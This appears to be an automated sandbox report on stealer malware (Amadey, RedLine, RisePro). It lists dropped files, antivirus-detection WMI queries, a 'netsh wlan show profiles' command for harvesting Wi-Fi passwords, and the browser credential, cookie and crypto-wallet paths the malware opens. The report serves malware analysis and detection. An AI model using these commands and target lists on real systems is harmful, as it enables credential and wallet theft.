Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B9E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B9E27A
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 15.2.chrosha.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.amert.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2792595641.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2089957305.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.3292101674.0000000004840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2687465416.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2831581300.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2110741282.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2880613801.0000000000071000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: powershell.exe, 0000000B.00000002.2827936126.00007FF848E80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
